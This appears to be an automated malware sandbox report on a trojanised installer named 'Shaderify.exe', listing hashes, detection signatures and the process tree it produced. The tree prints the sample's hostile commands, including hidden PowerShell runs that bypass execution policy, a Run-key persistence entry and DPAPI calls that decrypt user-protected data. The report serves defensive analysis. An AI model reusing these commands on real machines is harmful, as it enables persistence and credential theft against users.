Overview
overview
8Static
static
3Shaderify 8.4.4.exe
windows7-x64
8Shaderify 8.4.4.exe
windows10-2004-x64
8$PLUGINSDI...ls.dll
windows7-x64
3$PLUGINSDI...ls.dll
windows10-2004-x64
3$PLUGINSDI...em.dll
windows7-x64
3$PLUGINSDI...em.dll
windows10-2004-x64
3LICENSES.c...m.html
windows7-x64
1LICENSES.c...m.html
windows10-2004-x64
1Shaderify.exe
windows7-x64
8Shaderify.exe
windows10-2004-x64
8d3dcompiler_47.dll
windows10-2004-x64
1ffmpeg.dll
windows7-x64
1ffmpeg.dll
windows10-2004-x64
1libEGL.dll
windows7-x64
1libEGL.dll
windows10-2004-x64
1libGLESv2.dll
windows7-x64
1libGLESv2.dll
windows10-2004-x64
1resources/app.js
windows7-x64
3resources/app.js
windows10-2004-x64
3resources/elevate.exe
windows7-x64
1resources/elevate.exe
windows10-2004-x64
1swiftshade...GL.dll
windows7-x64
1swiftshade...GL.dll
windows10-2004-x64
1swiftshade...v2.dll
windows7-x64
1swiftshade...v2.dll
windows10-2004-x64
1vk_swiftshader.dll
windows7-x64
1vk_swiftshader.dll
windows10-2004-x64
1vulkan-1.dll
windows7-x64
1vulkan-1.dll
windows10-2004-x64
1$PLUGINSDI...7z.dll
windows7-x64
3$PLUGINSDI...7z.dll
windows10-2004-x64
3Analysis
-
max time kernel
148s -
max time network
159s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
03-06-2024 09:47
Static task
static1
Behavioral task
behavioral1
Sample
Shaderify 8.4.4.exe
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
Shaderify 8.4.4.exe
Resource
win10v2004-20240508-en
Behavioral task
behavioral3
Sample
$PLUGINSDIR/StdUtils.dll
Resource
win7-20240221-en
Behavioral task
behavioral4
Sample
$PLUGINSDIR/StdUtils.dll
Resource
win10v2004-20240426-en
Behavioral task
behavioral5
Sample
$PLUGINSDIR/System.dll
Resource
win7-20240215-en
Behavioral task
behavioral6
Sample
$PLUGINSDIR/System.dll
Resource
win10v2004-20240426-en
Behavioral task
behavioral7
Sample
LICENSES.chromium.html
Resource
win7-20240221-en
Behavioral task
behavioral8
Sample
LICENSES.chromium.html
Resource
win10v2004-20240508-en
Behavioral task
behavioral9
Sample
Shaderify.exe
Resource
win7-20240221-en
Behavioral task
behavioral10
Sample
Shaderify.exe
Resource
win10v2004-20240508-en
Behavioral task
behavioral11
Sample
d3dcompiler_47.dll
Resource
win10v2004-20240426-en
Behavioral task
behavioral12
Sample
ffmpeg.dll
Resource
win7-20240419-en
Behavioral task
behavioral13
Sample
ffmpeg.dll
Resource
win10v2004-20240426-en
Behavioral task
behavioral14
Sample
libEGL.dll
Resource
win7-20240508-en
Behavioral task
behavioral15
Sample
libEGL.dll
Resource
win10v2004-20240508-en
Behavioral task
behavioral16
Sample
libGLESv2.dll
Resource
win7-20240221-en
Behavioral task
behavioral17
Sample
libGLESv2.dll
Resource
win10v2004-20240508-en
Behavioral task
behavioral18
Sample
resources/app.js
Resource
win7-20231129-en
Behavioral task
behavioral19
Sample
resources/app.js
Resource
win10v2004-20240426-en
Behavioral task
behavioral20
Sample
resources/elevate.exe
Resource
win7-20240221-en
Behavioral task
behavioral21
Sample
resources/elevate.exe
Resource
win10v2004-20240508-en
Behavioral task
behavioral22
Sample
swiftshader/libEGL.dll
Resource
win7-20240508-en
Behavioral task
behavioral23
Sample
swiftshader/libEGL.dll
Resource
win10v2004-20240426-en
Behavioral task
behavioral24
Sample
swiftshader/libGLESv2.dll
Resource
win7-20240508-en
Behavioral task
behavioral25
Sample
swiftshader/libGLESv2.dll
Resource
win10v2004-20240508-en
Behavioral task
behavioral26
Sample
vk_swiftshader.dll
Resource
win7-20240221-en
Behavioral task
behavioral27
Sample
vk_swiftshader.dll
Resource
win10v2004-20240508-en
Behavioral task
behavioral28
Sample
vulkan-1.dll
Resource
win7-20240221-en
Behavioral task
behavioral29
Sample
vulkan-1.dll
Resource
win10v2004-20240226-en
Behavioral task
behavioral30
Sample
$PLUGINSDIR/nsis7z.dll
Resource
win7-20240215-en
Behavioral task
behavioral31
Sample
$PLUGINSDIR/nsis7z.dll
Resource
win10v2004-20240508-en
General
-
Target
Shaderify.exe
-
Size
120.4MB
-
MD5
2776d64baf7179ce926864738c2e8939
-
SHA1
b55826db4d6ca723869256b97af48761950677a0
-
SHA256
287b3a16f8e654deb64eb2fd9039803de16a81d17f55a140814ce7dda7f56d96
-
SHA512
b397926546ad482ab45a65cabb4668997ac0553786c98e8b1cc09cf4706378b8a8b53a30f27665ebbfc84bb66422c36b152a644be4438ba313714703d7cdc7b2
-
SSDEEP
1572864:o1f0+Sva7Hdp1Nhn+aCdrvdYrZ/7/lbg8udR8SnuSE49z:Nasulbg8yTnbEOz
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Shaderify.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation Shaderify.exe -
Loads dropped DLL 1 IoCs
Processes:
Shaderify.exepid process 4440 Shaderify.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Powershell = "\"powershell.exe\" -WindowStyle Hidden -ExecutionPolicy Bypass -File \"C:\\Users\\Admin\\AppData\\Roaming\\VTOizUgHSvlseoy.ps1\"" powershell.exe -
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 16 api.ipify.org 17 api.ipify.org 25 ipinfo.io 26 ipinfo.io -
An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs
Processes:
cmd.execmd.exepid process 2028 cmd.exe 4224 cmd.exe -
Enumerates processes with tasklist 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 12 IoCs
Processes:
powershell.exepowershell.exepowershell.exeShaderify.exeShaderify.exepid process 4124 powershell.exe 4124 powershell.exe 1592 powershell.exe 1592 powershell.exe 3876 powershell.exe 3876 powershell.exe 1688 Shaderify.exe 1688 Shaderify.exe 5072 Shaderify.exe 5072 Shaderify.exe 5072 Shaderify.exe 5072 Shaderify.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
tasklist.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 656 tasklist.exe Token: SeDebugPrivilege 4124 powershell.exe Token: SeDebugPrivilege 1592 powershell.exe Token: SeDebugPrivilege 3876 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Shaderify.execmd.execmd.exepowershell.execsc.execmd.execmd.exedescription pid process target process PID 4440 wrote to memory of 2940 4440 Shaderify.exe cmd.exe PID 4440 wrote to memory of 2940 4440 Shaderify.exe cmd.exe PID 4440 wrote to memory of 2520 4440 Shaderify.exe cmd.exe PID 4440 wrote to memory of 2520 4440 Shaderify.exe cmd.exe PID 2940 wrote to memory of 4124 2940 cmd.exe powershell.exe PID 2940 wrote to memory of 4124 2940 cmd.exe powershell.exe PID 2520 wrote to memory of 656 2520 cmd.exe tasklist.exe PID 2520 wrote to memory of 656 2520 cmd.exe tasklist.exe PID 4124 wrote to memory of 4772 4124 powershell.exe csc.exe PID 4124 wrote to memory of 4772 4124 powershell.exe csc.exe PID 4772 wrote to memory of 1924 4772 csc.exe cvtres.exe PID 4772 wrote to memory of 1924 4772 csc.exe cvtres.exe PID 4440 wrote to memory of 2028 4440 Shaderify.exe cmd.exe PID 4440 wrote to memory of 2028 4440 Shaderify.exe cmd.exe PID 2028 wrote to memory of 1592 2028 cmd.exe powershell.exe PID 2028 wrote to memory of 1592 2028 cmd.exe powershell.exe PID 4440 wrote to memory of 4224 4440 Shaderify.exe cmd.exe PID 4440 wrote to memory of 4224 4440 Shaderify.exe cmd.exe PID 4224 wrote to memory of 3876 4224 cmd.exe powershell.exe PID 4224 wrote to memory of 3876 4224 cmd.exe powershell.exe PID 4440 wrote to memory of 3320 4440 Shaderify.exe Shaderify.exe PID 4440 wrote to memory of 3320 4440 Shaderify.exe Shaderify.exe PID 4440 wrote to memory of 3320 4440 Shaderify.exe Shaderify.exe PID 4440 wrote to memory of 3320 4440 Shaderify.exe Shaderify.exe PID 4440 wrote to memory of 3320 4440 Shaderify.exe Shaderify.exe PID 4440 wrote to memory of 3320 4440 Shaderify.exe Shaderify.exe PID 4440 wrote to memory of 3320 4440 Shaderify.exe Shaderify.exe PID 4440 wrote to memory of 3320 4440 Shaderify.exe Shaderify.exe PID 4440 wrote to memory of 3320 4440 Shaderify.exe Shaderify.exe PID 4440 wrote to memory of 3320 4440 Shaderify.exe Shaderify.exe PID 4440 wrote to memory of 3320 4440 Shaderify.exe Shaderify.exe PID 4440 wrote to memory of 3320 4440 Shaderify.exe Shaderify.exe PID 4440 wrote to memory of 3320 4440 Shaderify.exe Shaderify.exe PID 4440 wrote to memory of 3320 4440 Shaderify.exe Shaderify.exe PID 4440 wrote to memory of 3320 4440 Shaderify.exe Shaderify.exe PID 4440 wrote to memory of 3320 4440 Shaderify.exe Shaderify.exe PID 4440 wrote to memory of 3320 4440 Shaderify.exe Shaderify.exe PID 4440 wrote to memory of 3320 4440 Shaderify.exe Shaderify.exe PID 4440 wrote to memory of 3320 4440 Shaderify.exe Shaderify.exe PID 4440 wrote to memory of 3320 4440 Shaderify.exe Shaderify.exe PID 4440 wrote to memory of 3320 4440 Shaderify.exe Shaderify.exe PID 4440 wrote to memory of 3320 4440 Shaderify.exe Shaderify.exe PID 4440 wrote to memory of 3320 4440 Shaderify.exe Shaderify.exe PID 4440 wrote to memory of 3320 4440 Shaderify.exe Shaderify.exe PID 4440 wrote to memory of 3320 4440 Shaderify.exe Shaderify.exe PID 4440 wrote to memory of 3320 4440 Shaderify.exe Shaderify.exe PID 4440 wrote to memory of 3320 4440 Shaderify.exe Shaderify.exe PID 4440 wrote to memory of 3320 4440 Shaderify.exe Shaderify.exe PID 4440 wrote to memory of 3320 4440 Shaderify.exe Shaderify.exe PID 4440 wrote to memory of 3320 4440 Shaderify.exe Shaderify.exe PID 4440 wrote to memory of 3320 4440 Shaderify.exe Shaderify.exe PID 4440 wrote to memory of 3320 4440 Shaderify.exe Shaderify.exe PID 4440 wrote to memory of 3320 4440 Shaderify.exe Shaderify.exe PID 4440 wrote to memory of 3320 4440 Shaderify.exe Shaderify.exe PID 4440 wrote to memory of 3320 4440 Shaderify.exe Shaderify.exe PID 4440 wrote to memory of 3320 4440 Shaderify.exe Shaderify.exe PID 4440 wrote to memory of 3320 4440 Shaderify.exe Shaderify.exe PID 4440 wrote to memory of 3320 4440 Shaderify.exe Shaderify.exe PID 4440 wrote to memory of 3320 4440 Shaderify.exe Shaderify.exe PID 4440 wrote to memory of 3320 4440 Shaderify.exe Shaderify.exe PID 4440 wrote to memory of 1688 4440 Shaderify.exe Shaderify.exe PID 4440 wrote to memory of 1688 4440 Shaderify.exe Shaderify.exe PID 4440 wrote to memory of 5072 4440 Shaderify.exe Shaderify.exe PID 4440 wrote to memory of 5072 4440 Shaderify.exe Shaderify.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Shaderify.exe"C:\Users\Admin\AppData\Local\Temp\Shaderify.exe"1⤵
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4440 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1""2⤵
- Suspicious use of WriteProcessMemory
PID:2940 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1"3⤵
- Command and Scripting Interpreter: PowerShell
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4124 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gvzwrytg\gvzwrytg.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:4772 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5D91.tmp" "c:\Users\Admin\AppData\Local\Temp\gvzwrytg\CSC560CAE5A71D24B2D88A8B8609B673FC9.TMP"5⤵PID:1924
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵
- Suspicious use of WriteProcessMemory
PID:2520 -
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:656 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,35,34,250,209,79,219,135,79,142,220,79,126,12,193,145,62,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,141,247,97,18,0,223,25,105,159,95,1,13,45,223,226,244,76,155,218,204,185,9,81,102,32,42,219,93,217,210,20,229,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,22,135,125,102,183,6,14,93,69,8,241,27,19,68,141,0,52,65,125,34,2,169,120,13,12,139,71,183,106,227,160,96,48,0,0,0,53,194,236,4,4,15,128,129,74,75,108,75,254,138,31,104,162,74,131,235,190,140,141,225,165,187,255,143,230,9,24,141,75,152,31,49,159,25,200,114,235,221,10,94,100,162,164,91,64,0,0,0,160,2,159,108,227,0,139,100,90,190,144,91,160,16,0,118,0,237,223,39,21,94,23,207,116,182,141,19,207,134,155,38,28,244,48,159,24,116,68,156,9,108,110,206,16,97,118,23,190,47,18,79,251,223,252,102,63,250,246,142,53,220,95,173), $null, 'CurrentUser')"2⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
PID:2028 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,35,34,250,209,79,219,135,79,142,220,79,126,12,193,145,62,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,141,247,97,18,0,223,25,105,159,95,1,13,45,223,226,244,76,155,218,204,185,9,81,102,32,42,219,93,217,210,20,229,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,22,135,125,102,183,6,14,93,69,8,241,27,19,68,141,0,52,65,125,34,2,169,120,13,12,139,71,183,106,227,160,96,48,0,0,0,53,194,236,4,4,15,128,129,74,75,108,75,254,138,31,104,162,74,131,235,190,140,141,225,165,187,255,143,230,9,24,141,75,152,31,49,159,25,200,114,235,221,10,94,100,162,164,91,64,0,0,0,160,2,159,108,227,0,139,100,90,190,144,91,160,16,0,118,0,237,223,39,21,94,23,207,116,182,141,19,207,134,155,38,28,244,48,159,24,116,68,156,9,108,110,206,16,97,118,23,190,47,18,79,251,223,252,102,63,250,246,142,53,220,95,173), $null, 'CurrentUser')3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1592 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,35,34,250,209,79,219,135,79,142,220,79,126,12,193,145,62,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,122,186,59,106,159,138,3,96,16,128,17,122,8,139,244,254,106,175,103,37,20,249,57,194,158,27,178,137,187,116,192,25,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,51,236,46,156,240,143,65,80,220,246,189,52,39,90,104,221,208,87,182,76,56,254,202,35,90,104,4,211,157,136,246,34,48,0,0,0,236,136,210,242,56,175,158,131,62,105,152,134,63,166,243,205,78,109,3,103,229,75,107,28,226,76,68,224,129,151,35,136,155,178,159,173,136,168,183,248,130,255,73,20,171,117,100,54,64,0,0,0,105,122,195,241,66,118,127,24,231,89,139,64,153,192,36,27,119,201,84,191,71,217,202,229,245,17,171,106,172,111,14,159,154,23,121,146,201,140,245,239,210,69,138,85,51,152,9,20,64,9,10,136,255,245,250,138,57,107,104,198,95,38,18,158), $null, 'CurrentUser')"2⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
PID:4224 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,35,34,250,209,79,219,135,79,142,220,79,126,12,193,145,62,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,122,186,59,106,159,138,3,96,16,128,17,122,8,139,244,254,106,175,103,37,20,249,57,194,158,27,178,137,187,116,192,25,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,51,236,46,156,240,143,65,80,220,246,189,52,39,90,104,221,208,87,182,76,56,254,202,35,90,104,4,211,157,136,246,34,48,0,0,0,236,136,210,242,56,175,158,131,62,105,152,134,63,166,243,205,78,109,3,103,229,75,107,28,226,76,68,224,129,151,35,136,155,178,159,173,136,168,183,248,130,255,73,20,171,117,100,54,64,0,0,0,105,122,195,241,66,118,127,24,231,89,139,64,153,192,36,27,119,201,84,191,71,217,202,229,245,17,171,106,172,111,14,159,154,23,121,146,201,140,245,239,210,69,138,85,51,152,9,20,64,9,10,136,255,245,250,138,57,107,104,198,95,38,18,158), $null, 'CurrentUser')3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3876 -
C:\Users\Admin\AppData\Local\Temp\Shaderify.exe"C:\Users\Admin\AppData\Local\Temp\Shaderify.exe" --type=gpu-process --field-trial-handle=1500,12723749145653602269,8771074544358891808,131072 --enable-features=WebComponentsV0Enabled --disable-features=CookiesWithoutSameSiteMustBeSecure,SameSiteByDefaultCookies,SpareRendererForSitePerProcess --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1824 /prefetch:22⤵PID:3320
-
C:\Users\Admin\AppData\Local\Temp\Shaderify.exe"C:\Users\Admin\AppData\Local\Temp\Shaderify.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1500,12723749145653602269,8771074544358891808,131072 --enable-features=WebComponentsV0Enabled --disable-features=CookiesWithoutSameSiteMustBeSecure,SameSiteByDefaultCookies,SpareRendererForSitePerProcess --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=2184 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:1688 -
C:\Users\Admin\AppData\Local\Temp\Shaderify.exe"C:\Users\Admin\AppData\Local\Temp\Shaderify.exe" --type=gpu-process --field-trial-handle=1500,12723749145653602269,8771074544358891808,131072 --enable-features=WebComponentsV0Enabled --disable-features=CookiesWithoutSameSiteMustBeSecure,SameSiteByDefaultCookies,SpareRendererForSitePerProcess --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=MAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAIAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1744 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
PID:5072
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1908
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD552cc110bb3777aa6bba7900630d4eb49
SHA13663dc658fd13d407e49781d1a5c2aa203c252fc
SHA256892a9edb03db3fd88fecc1e1a2f56a7339f16f6734e8d77e6538ea2c8c9026d6
SHA51289b80d2783e902d68ffd08b6f3fb1848ae6e6c4bf2d7a1e4afdac970b2ee6ffcc58116cdd6234e3d6278eb9413d36aafe62b5beca24a0846575d12af0c5112ab
-
Filesize
3KB
MD5f48896adf9a23882050cdff97f610a7f
SHA14c5a610df62834d43f470cae7e851946530e3086
SHA2563ae35c2828715a2f9a5531d334a0cfffc81396c2dc058ca42a9943f3cdc22e78
SHA51216644246f2a35a186fcb5c2b6456ed6a16e8db65ad1383109e06547f9b1f9358f071c30cca541ca4cf7bae66cb534535e88f75f6296a4bfc6c7b22b0684a6ba9
-
Filesize
1KB
MD5895e2a42e94e9cd0f28eaa2b6ecc01c2
SHA11853f120520e8fa793825de95434557215ee0b1f
SHA2562930446921bad0e440a607731e8488965a039dd60ef8432fbf0d2412d4e1dae7
SHA512acd1c8d88d69788f03d50224413fcae52d026b01b6bc311570114d68aed1fbbfeac67d9361115d9386555239c50ea490985d3f375d6a3b49339b7f960154d4f0
-
Filesize
1.4MB
MD556192831a7f808874207ba593f464415
SHA1e0c18c72a62692d856da1f8988b0bc9c8088d2aa
SHA2566aa8763714aa5199a4065259af792292c2a7d6a2c381aa27007255421e5c9d8c
SHA512c82aa1ef569c232b4b4f98a3789f2390e5f7bf5cc7e73d199fe23a3f636817edfdc2fb49ce7f69169c028a9dd5ab9f63e8f64964bb22424fc08db71e85054a33
-
Filesize
22B
MD576cdb2bad9582d23c1f6f4d868218d6c
SHA1b04f3ee8f5e43fa3b162981b50bb72fe1acabb33
SHA2568739c76e681f900923b900c9df0ef75cf421d39cabb54650c4b9ad19b6a76d85
SHA5125e2f959f36b66df0580a94f384c5fc1ceeec4b2a3925f062d7b68f21758b86581ac2adcfdde73a171a28496e758ef1b23ca4951c05455cdae9357cc3b5a5825f
-
Filesize
1KB
MD5cbddbe67e099b2400e5c3afeb2315f17
SHA1cc8bcf8edbfdbe6520e4b484648752ef7d0a9e43
SHA2565b1571e9ecbdb663625181683d64586c3ec9766a3dd59d66850bcbe7c9b1259c
SHA512c5f9a2af35455c2321f68a98660828edde4dd82724611638c351440560009c3fa1bc5fe6365403c1c6231990a7eac25b578a0f5b44882c12ee5f701ef3bea723
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD55b55dc709f69b621430f4a7455417228
SHA192a8727041b3ffaeb82659f52c952834ab16e89d
SHA256805d2635a07e5920d7c3da733094872368778f077c121ff9f876ede1f4575b02
SHA512ee521dac7b1a51f19da9abfc26861737e0aa20c1bf9e498ebceff7a0866585597e7dbf0218e699f6743b6644bba83047e48d3fed2735ae9a729561f77caf466e
-
Filesize
652B
MD50d66267aad53025049acbd10e4f1b994
SHA1cdb2f831b62a9899dc10d899cac2af6c6727d6d9
SHA256b177e4615b779ef9018f2546d3575763087e68cb59254be41aac20a7a7e4ace7
SHA512e9459f4b0d45a46d0285d53a992f9fbbb290b7b018aabfb16727a2cc164cdffe5e12335d10e2e26513bd79e746df031630c12c2b678ee2bb9e42611cb1e931e7
-
Filesize
426B
MD5b462a7b0998b386a2047c941506f7c1b
SHA161e8aa007164305a51fa2f1cebaf3f8e60a6a59f
SHA256a81f86cd4d33ebbf2b725df6702b8f6b3c31627bf52eb1cadc1e40b1c0c2bb35
SHA512eb41b838cc5726f4d1601d3c68d455203d3c23f17469b3c8cbdd552f479f14829856d699f310dec05fe7504a2ae511d0b7ffff6b66ceadb5a225efe3e2f3a020
-
Filesize
369B
MD50dad2a256aacf25ea2d570c6015d33d1
SHA1301639d7e32a844b25290d13ae1e09a06cf56589
SHA25638063aea7398717e64557d2619ec90a0725ff174cf66e2191a6d03c09fabcaa9
SHA51276469bfbf8b8fe87e137b87550710ea852fa91e7ba582012ea06deec2c7540cf11bbe4ab70064e99b7e178325031415c79abef82e71b80bd4959ac98b9146dd8